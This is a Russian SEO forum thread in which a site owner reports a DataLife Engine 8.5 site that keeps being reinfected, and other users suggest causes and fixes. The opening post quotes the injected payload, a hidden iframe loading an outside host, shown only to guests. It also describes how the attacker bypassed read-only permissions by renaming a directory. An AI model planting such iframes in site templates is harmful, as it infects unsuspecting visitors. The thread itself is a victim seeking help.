Взломали сайт на DLE 8.5 - SEO форум MaulTalk.com

Сообщение сайта

(Сообщение закроется через 3 секунды)

Здравствуйте, гость (

| Вход | Регистрация )

SEO форум MaulTalk.com > Веб-строительство > Программная часть

2 страниц

1 2 >

Взломали сайт на DLE 8.5

Опции

boomep

Topic Starter сообщение

4.7.2010, 12:51; Ответить: boomep

Сообщение #1

Участник

Группа: User
Сообщений: 183
Регистрация: 23.4.2008
Поблагодарили: 7 раз
Репутация:

Добрый день уважаемые форумчане.
02.06.2010 был взломан сайт. Версия DLE 8.5 лицензионная.
Принцип взлома следующий в файлы main.tpl прописывался левый ифрейм.
Либо же в файлы
<script type="text/javascript" src="/engine/classes/js/menu.js"></script>
<script type="text/javascript" src="/engine/classes/js/dle_ajax.js"></script>
<script type="text/javascript" src="/engine/classes/js/js_edit.js"></script>
<script type="text/javascript" src="/engine/classes/highslide/highslide.js"></script>

прописывался зашифрованный код, который тоже подгружал левый ифрем.
С яндекса начали приходить письма, мол на сайте вирус, и сайт будет выводиться в поиске с пометкой не безопастный .
Удалил код ифрейма. Сменил пароли везде, проверил на посторонние файлы. Все почистил. Сутки все ок, а потом сново вирус в файлах яваскрипта. Решил на все файлы куда прописывался вирус поставить права 0444 (только чтение). И попросил админов запретить изменение прав на все эти фалы.
На след день захожу и вижу сново прописанный код в файлах яваскрипта. На вопрос к аддминам как так получилоась? Полчил сдеж ответ.

Провели расследование и выяснили как были изменены файлы.
Злоумышленник не изменял файлы на которые мы установили приоритетный флаг, он просто переименовал директорию выше,
к примеру /site.ru/engine/classes/ была изменена на директорию /site.ru/engine/conf
Затем создал новую директорию site.ru/engine/classes/ скопировав туда все старые файлы уже без флага иммунитета
Тем самым уже внедрил вредоносный код в нужные файлы.

Снес полностью сайт, все посторонние модули убрал, только все что предлагает дле оставил.
ЗАлил оригинальные файлы с оф сайта дле. Попросил админов сменить пароли на все что можно, и не говорить мне (дабы исключить заряжение моегго компа хотя проверялся и КИС 2010 (лицензия) и ДР веб куриет). так и сделали. Сегодня утром проснулся и вижу на сайте сново вирус. Я в шоке и не знаю как дальше себя вести и что делать. Надеюсь найду помощь и ответы здесьь. Буду рад любому откликнувшемуся
Вот пример ифрейма.

[not-group=1,2,3] iframe src="http://miminus.ru/amg.cgi?stats" width="1" height="2" style="visibility: hidden;"> /iframe[/not-group]

скобки в iframe убрал

Все модули отключены реклама отключена , кроме маркетгида. ..
админы сервера уже два раза просканили сервак на наличие шелов и вирусов. Результат отрицательный
Арендую собственный сервер + админы к нему.

-1

Ответить с цитированием данного сообщения

valeros valeros 4.7.2010, 12:59; Сообщений: 506 Поблагодарили: 358 раз Репутация: 48 Просмотр профиля	4.7.2010, 12:59; Ответить: valeros Сообщение #2
Lux in tenebris Группа: Active User Сообщений: 506 Регистрация: 6.5.2009 Из: Qiev Поблагодарили: 358 раз Репутация: 48	Возможно заливают через соседей.Пробуйте сменить хост. КИС 2010 (лицензия) и ДР веб куриет - не панацея,троян может не палиться антивирусами -------------------- Прибыльная партнерка. 25$ на счет при регистрации по партн. ссылке

ChristmasNet ChristmasNet 4.7.2010, 13:00; Сообщений: 441 Поблагодарили: 93 раза Репутация: 16 Просмотр профиля	4.7.2010, 13:00; Ответить: ChristmasNet Сообщение #3
Бывалый Группа: User Сообщений: 441 Регистрация: 13.1.2010 Из: Россия, ХМАО Поблагодарили: 93 раза Репутация: 16	Заплатки все стоят на DLE? Сообщение отредактировал ChristmasNet - 4.7.2010, 13:00

Frankie Frankie 4.7.2010, 17:58; Сообщений: 1562 Поблагодарили: 326 раз Репутация: 38 Просмотр профиля	4.7.2010, 17:58; Ответить: Frankie Сообщение #4
Старожил Группа: Active User Сообщений: 1562 Регистрация: 18.9.2009 Поблагодарили: 326 раз Репутация: 38	(ChristmasNet @ 4.7.2010, 13:00) Заплатки все стоят на DLE? а на 8.5 разве есть какие-то заплатки? поделитесь

Guerrilla Guerrilla 4.7.2010, 18:01; Сообщений: 550 Поблагодарили: 115 раз Репутация: 15 Просмотр профиля	4.7.2010, 18:01; Ответить: Guerrilla Сообщение #5
Завсегдатай Группа: Active User Сообщений: 550 Регистрация: 2.3.2008 Из: Мир Поблагодарили: 115 раз Репутация: 15	Почистите комп антивирусными программами и смените пароли на фтп.

Hallboy222 Hallboy222 4.7.2010, 18:03; Сообщений: 2582 Поблагодарили: 872 раза Репутация: 149 Просмотр профиля	4.7.2010, 18:03; Ответить: Hallboy222 Сообщение #6
Любитель идей Группа: Active User Сообщений: 2582 Регистрация: 27.5.2010 Из: Москва Поблагодарили: 872 раза Репутация: 149	(Frankie @ 4.7.2010, 17:58) а на 8.5 разве есть какие-то заплатки? поделитесь Раз, Два. Плюс если есть форум dle forum, то Три. Поблагодарили: (2) Frankie, Garia

iBBi iBBi 4.7.2010, 19:07; Сообщений: 227 Поблагодарили: 31 раз Репутация: 7 Просмотр профиля	4.7.2010, 19:07; Ответить: iBBi Сообщение #7
Участник Группа: User Сообщений: 227 Регистрация: 20.8.2009 Поблагодарили: 31 раз Репутация: 7	(Guerrilla @ 4.7.2010, 17:01) Почистите комп антивирусными программами и смените пароли на фтп. не читаем посты? Попросил админов сменить пароли на все что можно, и не говорить мне (дабы исключить заряжение моегго компа хотя проверялся и КИС 2010 (лицензия) и ДР веб куриет). так и сделали. Сегодня утром проснулся и вижу на сайте сново вирус.

boomep Topic Starter boomepTopic Starter 4.7.2010, 19:31; Сообщений: 183 Поблагодарили: 7 раз Репутация: 7 Просмотр профиля	Topic Starter 4.7.2010, 19:31; Ответить: boomep Сообщение #8
Участник Группа: User Сообщений: 183 Регистрация: 23.4.2008 Поблагодарили: 7 раз Репутация: 7	(iBBi @ 4.7.2010, 18:07) не читаем посты? во во.. Все написано, и про пароли к фтп и то что у меня фтп отклчено и про смену паролей. Токо забылся указать , чтокогда перезаливал файлы сайта, а это было вчера , то качал архив с оф сайта дле, где заплатки уже включены в новом архиве Сообщение отредактировал boomep - 4.7.2010, 19:31

Hallboy222 Hallboy222 4.7.2010, 19:33; Сообщений: 2582 Поблагодарили: 872 раза Репутация: 149 Просмотр профиля	4.7.2010, 19:33; Ответить: Hallboy222 Сообщение #9
Любитель идей Группа: Active User Сообщений: 2582 Регистрация: 27.5.2010 Из: Москва Поблагодарили: 872 раза Репутация: 149	(boomep @ 4.7.2010, 19:31) Все написано, и про пароли к фтп и то что у меня фтп отклчено и про смену паролей. Токо забылся указать , чтокогда перезаливал файлы сайта, а это было вчера , то качал архив с оф сайта дле, где заплатки уже включены в новом архиве Так, а есть ли у вас на сайте форум?

boomep Topic Starter boomepTopic Starter 4.7.2010, 21:39; Сообщений: 183 Поблагодарили: 7 раз Репутация: 7 Просмотр профиля	Topic Starter 4.7.2010, 21:39; Ответить: boomep Сообщение #10
Участник Группа: User Сообщений: 183 Регистрация: 23.4.2008 Поблагодарили: 7 раз Репутация: 7	нет форуума нету

« Предыдущая тема · Программная часть · Следующая тема »

2 страниц

1 2 >

2 чел. читают эту тему (гостей: 2, скрытых пользователей: 0)

Пользователей: 0

Похожие темы

Тема	Ответов	Автор	Просмотров	Последний ответ
Ваш сайт блокирует Роскомнадзор?	27	hollywooduk	5719	17.4.2024, 0:19 автор: Omaxis
Прототипирование + дизайн + вёрстка = красивый и эффективный сайт под ключ	0	bunneh	349	16.4.2024, 18:02 автор: bunneh
Если в сайт с одними ключами, которые там долго, добавить новую рубрику с новыми ключами	2	Tutich	1234	16.4.2024, 8:27 автор: Tutich
[Услуги] Баннер/Графика/Сайт	240	FillPlay	180528	31.3.2024, 22:58 автор: FillPlay
Тысячи ботовых переходов на сайт	18	Suagaring	4613	26.3.2024, 21:42 автор: c4p1t4l15t

Режим отображения: Стандартный · Переключить на: Линейный · Переключить на: Древовидный

Подписка на тему · Сообщить другу · Версия для печати · Подписка на этот форум

Текстовая версия

Сейчас: 20.4.2024, 8:39

Дизайн